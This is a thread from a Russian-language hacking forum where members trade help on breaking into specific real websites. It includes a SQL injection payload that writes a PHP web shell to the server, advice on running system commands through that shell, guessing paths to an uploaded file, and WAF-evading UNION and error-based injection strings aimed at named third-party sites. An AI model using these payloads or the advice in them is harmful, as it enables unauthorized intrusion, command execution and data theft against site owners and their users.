Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,671
    Likes Received:
    895
    Reputations:
    363
    зачем текст шелла в кавычках и сверху еще hex?
    у вас там и так все нормально льется.
    Code:
    union+select+1,2,%27<?php+system($_GET[q]);?>%27,4,5,6,7+from+mysql.user+into+outfile+%27/usr/local/www/data/555.php%27--+
     
    _________________________
  2. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    у Вас кавычки в гет параметра e неправильны еще в добавок! Вы с ворда наверно вставляли)
     
  3. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Нет, 1 2
    Warning: system() [function.system]: Cannot execute a blank command in /usr/local/www/data/555.php on line 1
    4 5 6 7
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,671
    Likes Received:
    895
    Reputations:
    363
    ну так попробуйте выполнить ls, например
     
    _________________________
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,772
    Likes Received:
    842
    Reputations:
    857
    blank - пустой

    Вы вызываете шелл-код с пустыми параметрами.

    Как и сказал faza02 передайте какой-либо аргумент в функцию вызова.
     
    _________________________
  6. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Здрасвуйте! Помогите разобраться, заливаю php файл, на сайт. И он доступен по силке
    site/folder//file.php?file=2278 но сразу начинаеться скачивание, а можно сделать так чтоб он отображался на сайте?
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,772
    Likes Received:
    842
    Reputations:
    857
    Извлечь полный путь до файла из базы данных или сбрутить этот путь.
     
    _________________________
  8. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    В базе нашел только это:

    r_files:id
    r_files:name
    r_files:extn
    r_files:hashname
    r_files:type
    r_files:size
    r_files:password
    r_files:rid
    r_files:hashnews
    r_files:visitors

    А брутить путь это как?
     
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,772
    Likes Received:
    842
    Reputations:
    857
    url/files/file.php
    url/content/files/files.php
    url/img/file.php

    и тд и тп до бесконечности
     
    _________________________
  10. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    тыпу file.php это мой файл?
     
  11. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,772
    Likes Received:
    842
    Reputations:
    857
    Файл может переименовываться. Это надо учесть.
     
    _________________________
  12. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    понял, спасибо
     
  13. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Ну вот я сделал такой запрос localhost/l00k.php?q=1 и выдаёт 1 2 4 5 6 7
     
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,671
    Likes Received:
    895
    Reputations:
    363
    у вас там system. system - выполнение системных команд. что за системная команда 1? передайте ls, wget, cd, pwd, uname, но не 1
     
    _________________________
  15. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,772
    Likes Received:
    842
    Reputations:
    857
    Завязывайте хекать. Это - не ваше.
     
    _________________________
    2 people like this.
  16. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    http://www.hamradio.com/admincp/verify.cfm
    POST

    Можно ли как нибудь проникнуть тут?
     
    #23996 Br@!ns, 17 Mar 2015
    Last edited: 17 Mar 2015
  17. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    И еще один, не выходит раскрутить, непонятно что и как фильтрует. Подскажите.

     
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,772
    Likes Received:
    842
    Reputations:
    857
    Бегло осмотрел.

    MQ on

    Фильтруются запятые, служебные символы типа @

    Скобки не фильтруются.

    Попробуй функции, которым не нужна запятая в синтаксисе

    Типа

    http://www.maesen.com/sexshop/ArticulosMini.php?pagina=45+and+49=(select+ascii((1)))

    Опять же некоторые выборочно фильтруются. Функция Ord например.

    Может быть, есть смысл пообходить ваф. Я сейчас не в тех условиях, когда могу генерировать траффик =)

    Направление для мыслей дал.
     
    _________________________
    1 person likes this.
  19. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    Как обойти сей WAF:
    Code:
    http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+order+by+8--
    Задержка какая-то если использовать union select.
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,671
    Likes Received:
    895
    Reputations:
    363
    все стандартно:
    Code:
    http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+/*!union*/+select+1,2,3,4,5,version(),7,8--+
    error-based:
    Code:
    http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+|%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29
    главное, чтобы не было union (возможно что-то еще, не смотрел дальше)
     
    _________________________
Loading...
Thread Status:
Not open for further replies.